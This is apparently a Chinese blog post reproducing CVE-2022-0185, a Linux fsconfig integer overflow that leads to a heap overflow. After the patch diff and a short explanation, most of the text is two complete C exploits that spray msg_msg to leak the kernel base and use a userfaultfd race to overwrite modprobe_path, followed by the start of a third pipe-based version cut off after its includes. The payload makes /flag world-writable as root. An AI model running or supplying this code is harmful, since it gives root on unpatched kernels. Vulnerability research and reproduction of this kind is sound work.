CVE-2022-0185:fsconfig之整数溢出导致堆溢出写

已于 2023-12-12 15:41:16 修改
阅读量147 收藏
点赞数 1
分类专栏: CVE复现 文章标签: cve复现
于 2023-12-08 19:43:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/134885856
版权

影响版本:Linux-v5.1~v5.16.2

测试版本:Linux-5.11.22,由于懒得搞环境,所以直接用的 bsauce 大佬提供的 测试环境

看看 patch


diff --git a/fs/fs_context.c b/fs/fs_context.c
index b7e43a780a625b..24ce12f0db32e5 100644
--- a/fs/fs_context.c
+++ b/fs/fs_context.c
@@ -548,7 +548,7 @@ static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
 			      param->key);
 	}
 
-	if (len > PAGE_SIZE - 2 - size)
+	if (size + len + 2 > PAGE_SIZE)
 		return invalf(fc, "VFS: Legacy: Cumulative options too large");
 	if (strchr(param->key, ',') ||
 	    (param->type == fs_value_is_string &&

这里 len/size 都是无符号数,所以当 2+size > PAGE_SIZE 时,则 PAGE_SIZE - 2 - size 是一个很大的数从而绕过检查,这里会导致堆溢出。

溢出 kmem_cache:kmalloc-4k

利用思路:

1)堆喷 msg_msg,触发第一次漏洞溢出修改 m_ts 从而泄漏内核基地址

2)堆喷 msg_msg,触发第二次漏洞溢出配合 userfaultfd修改 m_next 实现任意地址写 modprobe_path

注:bsauce 佬提供的测试环境内核版本为 v5.11.22,普通用户是无法直接使用 userfaultfd 的,我看 bsauce 佬直接写了个 fuse 驱动模块,然后利用的 fuse 去增大竞争窗口。但是这里为了方便,我直接在设置了普通用户可以使用 userfaultfd,这里只是为了简化利用。

echo 1 > /proc/sys/vm/unprivileged_userfaultfd

第一版垃圾 exp 如下:这里调整一下堆喷策略效果应该会好很多

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/mount.h>

#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsmount
#define __NR_fsmount 432
#endif
#ifndef __NR_move_mount
#define __NR_move_mount 429
#endif

#define SPARY_MSG_NUMS 8
int hijack_idx;
size_t modprobe_path;
int fs_fds[SPARY_MSG_NUMS];

int fsopen(const char* fs_name, unsigned int flags)
{
    return syscall(__NR_fsopen, fs_name, flags);
}

int fsconfig(int fd, unsigned int cmd, const char* key, const char* value, int aux)
{
    return syscall(__NR_fsconfig, fd, cmd, key, value, aux);
}

int fsmount(int fs_fd, unsigned int flags, unsigned int attr_flags)
{
    return syscall(__NR_fsmount, fs_fd, flags, attr_flags);
}

int move_mount(int from_dfd, const char* from_path, int to_dfd, const char* to_path, unsigned int flags)
{
    return syscall(__NR_move_mount, from_dfd, from_path, to_dfd, to_path, flags);
}

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}


struct msg_buf {
        long m_type;
        char m_text[1];
};

struct msg_header {
        void* l_next;
        void* l_prev;
        long m_type;
        size_t m_ts;
        void* next;
        void* security;
};

void get_flag(){
        system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x"); // modeprobe_path 修改为了 /tmp/x
        system("chmod +x /tmp/x");
        system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy"); // 非法格式的二进制文件
        system("chmod +x /tmp/dummy");
        system("/tmp/dummy"); // 执行非法格式的二进制文件 ==> 执行 modeprobe_path 指向的文件 /tmp/x
        sleep(0.3);
        system("cat /flag");
        exit(0);
}

void register_userfaultfd(pthread_t* moniter_thr, void* addr, long len, void* handler)
{
        long uffd;
        struct uffdio_api uffdio_api;
        struct uffdio_register uffdio_register;

        uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);
        if (uffd < 0) perror("[X] syscall for __NR_userfaultfd"), exit(-1);

        uffdio_api.api = UFFD_API;
        uffdio_api.features = 0;
        if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) puts("[X] ioctl-UFFDIO_API"), exit(-1);

        uffdio_register.range.start = (long long)addr;
        uffdio_register.range.len = len;
        uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
        if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) puts("[X] ioctl-UFFDIO_REGISTER"), exit(-1);

        if (pthread_create(moniter_thr, NULL, handler, (void*)uffd) < 0)
                puts("[X] pthread_create at register_userfaultfd"), exit(-1);
}

char copy_src[0x1000];
void* handler(void* arg)
{
        struct uffd_msg msg;
        struct uffdio_copy uffdio_copy;
        long uffd = (long)arg;

        for(;;)
        {
                int res;
                struct pollfd pollfd;
                pollfd.fd = uffd;
                pollfd.events = POLLIN;
                if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);

                res = read(uffd, &msg, sizeof(msg));
                if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
                if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
                if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);

                puts("[+] Now in userfaultfd handler");
                size_t buf = modprobe_path - 8;
                char* x = &buf;
                char str[] = "/tmp/x";
                printf("hijack_idx ==> %d\n", hijack_idx);
                fsconfig(fs_fds[hijack_idx], FSCONFIG_SET_STRING, "\x00", "012345678901234567890AAAAAAAA", 0);
                fsconfig(fs_fds[hijack_idx], FSCONFIG_SET_STRING, "\x00", x, 0);
                memset(copy_src, 0, sizeof(copy_src));
                strncpy(copy_src, str, strlen(str));
                strncpy(copy_src+8, str, strlen(str));

                uffdio_copy.src = (long long)copy_src;
                uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
                uffdio_copy.len = 0x1000;
                uffdio_copy.mode = 0;
                uffdio_copy.copy = 0;
                if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
        }
}


size_t do_leak()
{
        char X_X = 1;
        int fs_fd;
        char buf[0x2000];
        char msg_buffer[0x2000];
        int msg_qid[SPARY_MSG_NUMS];
        size_t kernel_offset;
        struct msg_buf* msg_buf = (struct msg_buf*)msg_buffer;

        memset(msg_buffer, 0, sizeof(msg_buffer));
        msg_buf->m_type = 1;

if (!X_X) goto X_X_Label;
        for (int i = 0; i < SPARY_MSG_NUMS / 2; i++)
        {
                if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
                *(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
                *(uint64_t*)(msg_buf->m_text+8) = i;
                if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
                if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
        }

        fs_fd = fsopen("ext4", 0);
        if (fs_fd < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);

        for (int i = 0; i < 273; i++)
        {
                fsconfig(fs_fd, FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
        }

        fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "012345678901234567890", 0);

        for (int i = SPARY_MSG_NUMS / 2; i < SPARY_MSG_NUMS; i++)
        {
                if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
                *(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
                *(uint64_t*)(msg_buf->m_text+8) = i;
                if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
                if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
        }

        for (int i = 0; i < SPARY_MSG_NUMS*2; i++)
        {
                if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
        }

        fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "\xc8\x1f", 0);
        goto GO;

X_X_Label:
        fs_fd = fsopen("ext4", 0);
        if (fs_fd < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);

        for (int i = 0; i < 273; i++)
        {
                fsconfig(fs_fd, FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
        }

        fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "012345678901234567890", 0);

        for (int i = 0; i < SPARY_MSG_NUMS; i++)
        {
                if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
                *(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
                *(uint64_t*)(msg_buf->m_text+8) = i;
                if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
                if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
        }

        for (int i = 0; i < SPARY_MSG_NUMS*2; i++)
        {
                if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
        }

        fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "\xc8\x1f", 0);

GO:
        kernel_offset = -1;
        size_t vim_mtype;
        for (int i = 0; i < SPARY_MSG_NUMS; i++)
        {
                memset(buf, 0, sizeof(buf));
                if (msgrcv(msg_qid[i], buf, 0x2000-0x30-0x8, 0, IPC_NOWAIT|MSG_COPY|MSG_NOERROR) >= 0x2000-0x30-0x8)
                {
                        for (int k = 0; k < 0x1000 / 8; k++)
                        {
                                size_t addr = *(uint64_t*)(buf+0x1000+k*8);
                                vim_mtype = ((struct msg_buf*)buf)->m_type;
                                if (addr > 0xffffffff81000000 && (addr&0xfff) == 0x770)
                                {
                                        hexx("vim_mtype", vim_mtype);
                                        kernel_offset = addr - 0xffffffff81f36770;
                                        hexx("kernel_offset", kernel_offset);
                                        break;
                                }
                        }
                        if (!X_X) msgrcv(msg_qid[i], buf, 0x2000-0x30-0x8, vim_mtype, 0);
                        //binary_dump("OOB READ DATA", buf, 0x2000);
                        break;
                }
        }
        return kernel_offset;
}

void hijack_modprobePath()
{
        char buf[0x2000];
        char msg_buffer[0x2000];
        int msg_qid[SPARY_MSG_NUMS*2];
        size_t kernel_offset;
        struct msg_buf* msg_buf = (struct msg_buf*)msg_buffer;



        memset(msg_buffer, 0, sizeof(msg_buffer));
        msg_buf->m_type = 1;
        for (int i = 0; i < SPARY_MSG_NUMS; i++)
        {
                if ((msg_qid[i*2] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
                *(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
                *(uint64_t*)(msg_buf->m_text+8) = i*2+1;
                if (msgsnd(msg_qid[i*2], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");

                fs_fds[i] = fsopen("ext4", 0);
                if (fs_fds[i] < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);
                for (int j = 0; j < 273; j++)
                {
                        fsconfig(fs_fds[i], FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
                }

                if ((msg_qid[i*2+1] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
                *(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
                *(uint64_t*)(msg_buf->m_text+8) = i*2+1;
                if (msgsnd(msg_qid[i*2+1], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");

//              if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
//              *(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
//              *(uint64_t*)(msg_buf->m_text+8) = i;
//              if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
        }

        for (int i = 0; i < SPARY_MSG_NUMS; i++)
        {
                msgrcv(msg_qid[i], buf, 0x1000+0x20-0x30-0x8, 1, 0);
        }

        char* uffd_buf;
        pthread_t thr[SPARY_MSG_NUMS];
        for (hijack_idx = 0; hijack_idx < SPARY_MSG_NUMS; hijack_idx++)
        {
                msg_buf = (struct msg_buf*)buf;
                msg_buf->m_type = 1;
                if ((msg_qid[hijack_idx] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
                if (msgsnd(msg_qid[hijack_idx], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");

                uffd_buf = NULL;
                uffd_buf = mmap(0, 0x2000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
                if (uffd_buf <= 0) err_exit("FAILED to mmap uffd_buf");
                register_userfaultfd(&thr[hijack_idx], uffd_buf+0x1000, 0x1000, handler);
                msg_buf = (struct msg_buf*)(uffd_buf+0x30);

                if ((msg_qid[hijack_idx] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
                msg_buf->m_type = 1;
                if (msgsnd(msg_qid[hijack_idx], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
                munmap(uffd_buf, 0x2000);
        }

}

int main(int argc, char** argv, char** envp)
{
        bind_core(0);
        pid_t pid;
        int pipe_fd[2];
        pipe(pipe_fd);
        pid = fork();
        if (!pid)
        {
                unshare(CLONE_NEWNS|CLONE_NEWUSER);
                size_t kernel_offset;
                kernel_offset = do_leak();
                if (kernel_offset == -1) err_exit("FAILED to leak kernel_offset");
                modprobe_path = 0xffffffff8346c160 + kernel_offset;
                hexx("modprobe_path", modprobe_path);
                hijack_modprobePath();
                write(pipe_fd[1], "X", 1);
                exit(0);
        } else if (pid < 0) {

                err_exit("FAILED to fork a new process");
        } else {
                char buf[1];
                read(pipe_fd[0], buf, 1);
                get_flag();
        }

        return 0;
}

效果如下:这里堆喷策略比较垃圾,成功率极低,后面再改改吧。

=========================================================================

修改了下堆喷策略,成功率提高了不少,虽然还不是很理想,比如受到 userfaultfd,modprobe_path可写的限制。这个好像可以直接套 pipe 构造页级UAF,后面再看看。

exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/mount.h>

#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsmount
#define __NR_fsmount 432
#endif
#ifndef __NR_move_mount
#define __NR_move_mount 429
#endif

#define SPARY_MSG_NUMS 8
size_t modprobe_path;
int fs_fds[SPARY_MSG_NUMS*2];

int fsopen(const char* fs_name, unsigned int flags)
{
    return syscall(__NR_fsopen, fs_name, flags);
}

int fsconfig(int fd, unsigned int cmd, const char* key, const char* value, int aux)
{
    return syscall(__NR_fsconfig, fd, cmd, key, value, aux);
}

int fsmount(int fs_fd, unsigned int flags, unsigned int attr_flags)
{
    return syscall(__NR_fsmount, fs_fd, flags, attr_flags);
}

int move_mount(int from_dfd, const char* from_path, int to_dfd, const char* to_path, unsigned int flags)
{
    return syscall(__NR_move_mount, from_dfd, from_path, to_dfd, to_path, flags);
}

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}


struct msg_buf {
        long m_type;
        char m_text[1];
};

struct msg_header {
        void* l_next;
        void* l_prev;
        long m_type;
        size_t m_ts;
        void* next;
        void* security;
};

void get_flag(){
        system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x"); // modeprobe_path 修改为了 /tmp/x
        system("chmod +x /tmp/x");
        system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy"); // 非法格式的二进制文件
        system("chmod +x /tmp/dummy");
        system("/tmp/dummy"); // 执行非法格式的二进制文件 ==> 执行 modeprobe_path 指向的文件 /tmp/x
        sleep(0.3);
        system("cat /flag");
}

void register_userfaultfd(pthread_t* moniter_thr, void* addr, long len, void* handler)
{
        long uffd;
        struct uffdio_api uffdio_api;
        struct uffdio_register uffdio_register;

        uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);
        if (uffd < 0) perror("[X] syscall for __NR_userfaultfd"), exit(-1);

        uffdio_api.api = UFFD_API;
        uffdio_api.features = 0;
        if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) puts("[X] ioctl-UFFDIO_API"), exit(-1);

        uffdio_register.range.start = (long long)addr;
        uffdio_register.range.len = len;
        uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
        if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) perror("[X] ioctl-UFFDIO_REGISTER"), exit(-1);

        if (pthread_create(moniter_thr, NULL, handler, (void*)uffd) < 0)
                puts("[X] pthread_create at register_userfaultfd"), exit(-1);
}

char copy_src[0x1000];
void* handler(void* arg)
{
        struct uffd_msg msg;
        struct uffdio_copy uffdio_copy;
        long uffd = (long)arg;

        for(;;)
        {
                int res;
                struct pollfd pollfd;
                pollfd.fd = uffd;
                pollfd.events = POLLIN;
                if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);

                res = read(uffd, &msg, sizeof(msg));
                if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
                if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
                if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);

                puts("[+] Now in userfaultfd handler");
                size_t buf = modprobe_path - 8;
                char* x = &buf;
                char str[] = "/tmp/x";
                for (int i = 0; i < SPARY_MSG_NUMS*2; i++)
                {
                        fsconfig(fs_fds[i], FSCONFIG_SET_STRING, "\x00", "012345678901234567890AAAAAAAA", 0);
                        fsconfig(fs_fds[i], FSCONFIG_SET_STRING, "\x00", x, 0);
                }
                memset(copy_src, 0, sizeof(copy_src));
                strncpy(copy_src, str, strlen(str));
                strncpy(copy_src+8, str, strlen(str));

                uffdio_copy.src = (long long)copy_src;
                uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
                uffdio_copy.len = 0x1000;
                uffdio_copy.mode = 0;
                uffdio_copy.copy = 0;
                if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
        }
}


size_t do_leak()
{
        int fs_fd;
        char buf[0x2000];
        char msg_buffer[0x2000];
        int msg_qid[SPARY_MSG_NUMS*2];
        size_t kernel_offset;
        struct msg_buf* msg_buf = (struct msg_buf*)msg_buffer;

        memset(msg_buffer, 0, sizeof(msg_buffer));
        msg_buf->m_type = 1;

        for (int i = 0; i < 20; i++)
        {
                if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
        }

        for (int i = 0; i < SPARY_MSG_NUMS; i++)
        {
                if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
                *(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
                *(uint64_t*)(msg_buf->m_text+8) = i;
                if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
                if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
        }

        fs_fd = fsopen("ext4", 0);
        if (fs_fd < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);

        for (int i = 0; i < 273; i++)
        {
                fsconfig(fs_fd, FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
        }

        fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "012345678901234567890", 0);

        for (int i = 0; i < 10; i++)
        {
                if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
        }

        for (int i = SPARY_MSG_NUMS; i < SPARY_MSG_NUMS*2; i++)
        {
                if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
                *(uint64_t*)(msg_buf->m_text) = 0xAAAABBBBCCCCDDDD;
                *(uint64_t*)(msg_buf->m_text+8) = i;
                if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
                if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
        }

        for (int i = 0; i < 30; i++)
        {
                if (open("/proc/self/stat", O_RDONLY) < 0) err_exit("FAILED to open /proc/self/stat file");
        }

        fsconfig(fs_fd, FSCONFIG_SET_STRING, "\x00", "\xc8\x1f", 0);

        kernel_offset = -1;
        size_t vim_mtype;
        for (int i = 0; i < SPARY_MSG_NUMS*2; i++)
        {
                memset(buf, 0, sizeof(buf));
                if (msgrcv(msg_qid[i], buf, 0x2000-0x30-0x8, 0, IPC_NOWAIT|MSG_COPY|MSG_NOERROR) >= 0x2000-0x30-0x8)
                {
                        for (int k = 0; k < 0x1000 / 8; k++)
                        {
                                size_t addr = *(uint64_t*)(buf+0x1000+k*8);
                                vim_mtype = ((struct msg_buf*)buf)->m_type;
                                if (addr > 0xffffffff81000000 && (addr&0xfff) == 0x770)
                                {
                                        hexx("vim_mtype", vim_mtype);
                                        kernel_offset = addr - 0xffffffff81f36770;
                                        hexx("kernel_offset", kernel_offset);
                                        break;
                                }
                        }
                        //binary_dump("OOB READ DATA", buf, 0x2000);
                        break;
                }
        }
        return kernel_offset;
}

void hijack_modprobePath()
{
        puts("==> hijack modprobe_path <==");
        char buf[0x2000];
        char msg_buffer[0x2000];
        int msg_qid[SPARY_MSG_NUMS];
        int qid;
        size_t kernel_offset;
        struct msg_buf* msg_buf = (struct msg_buf*)msg_buffer;

        memset(msg_buffer, 0, sizeof(msg_buffer));
        msg_buf->m_type = 1;
        for (int i = 0; i < SPARY_MSG_NUMS; i++)
        {
                fs_fds[i*2] = fsopen("ext4", 0);
                if (fs_fds[i*2] < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);
                for (int j = 0; j < 273; j++)
                {
                        fsconfig(fs_fds[i*2], FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
                }

        //      if ((msg_qid[i] = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
        //      if (msgsnd(msg_qid[i], msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");

                if (i == SPARY_MSG_NUMS / 2)
                {
                        if ((qid = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
                        if (msgsnd(qid, msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
                }

                fs_fds[i*2+1] = fsopen("ext4", 0);
                if (fs_fds[i*2+1] < 0) puts("[X] FAILED to fsopen ext4 fs"), exit(-1);
                for (int j = 0; j < 273; j++)
                {
                        fsconfig(fs_fds[i*2+1], FSCONFIG_SET_STRING, "Pwner", "XiaozaYa", 0);
                }
        }

//      for (int i = 0; i < SPARY_MSG_NUMS; i++)
//      {
//              if (msgrcv(msg_qid[i], buf, 0x1000+0x20-0x30-0x8, 1, 0) < 0)
//                      err_exit("FAILED to msgrcv msg");
//      }

        if (msgrcv(qid, buf, 0x1000+0x20-0x30-0x8, 1, 0) < 0)
                err_exit("FAILED to msgrcv msg");

        pthread_t thr;
        char* uffd_buf;
        msg_buf = (struct msg_buf*)msg_buffer;
        msg_buf->m_type = 1;
//      for (int i = 0; i < SPARY_MSG_NUMS / 3; i++)
//      {
//              if ((qid = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
//              if (msgsnd(qid, msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
//
//      }
        uffd_buf = mmap(0, 0x2000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
        if (uffd_buf <= 0) err_exit("FAILED to mmap for uffd_buf");
        register_userfaultfd(&thr, uffd_buf+0x1000, 0x1000, handler);
        msg_buf = (struct msg_buf*)(uffd_buf+0x30);
        msg_buf->m_type = 1;
        if ((qid = msgget(IPC_PRIVATE, 0666|IPC_CREAT)) < 0) err_exit("FAILED to msgget a msg queue");
        if (msgsnd(qid, msg_buf, 0x1000+0x20-0x30-0x8, 0) < 0) err_exit("FAILED to msgsnd msg");
}

int main(int argc, char** argv, char** envp)
{
        bind_core(0);
        pid_t pid;
        int pipe_fd[2];
        pipe(pipe_fd);
        pid = fork();
        if (!pid)
        {
                unshare(CLONE_NEWNS|CLONE_NEWUSER);
                size_t kernel_offset;
                kernel_offset = do_leak();
                if (kernel_offset == -1) err_exit("FAILED to leak kernel_offset");
                modprobe_path = 0xffffffff8346c160 + kernel_offset;
                hexx("modprobe_path", modprobe_path);
                hijack_modprobePath();
                write(pipe_fd[1], "X", 1);
                puts("[+] CHILED END");
                exit(0);
        } else if (pid < 0) {

                err_exit("FAILED to fork a new process");
        } else {
                char buf[1];
                read(pipe_fd[0], buf, 1);
                get_flag();
                puts("[+] PARENT NED");
        }
        puts("[+] OVER");
        return 0;
}

=========================================================================

尝试套了下自写管道系统的板子,成功率还行,失败的主要原因在于pipe_buffer与漏洞堆块不相邻导致溢出写失败

exp如下:

#define _GNU_SOURCE

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
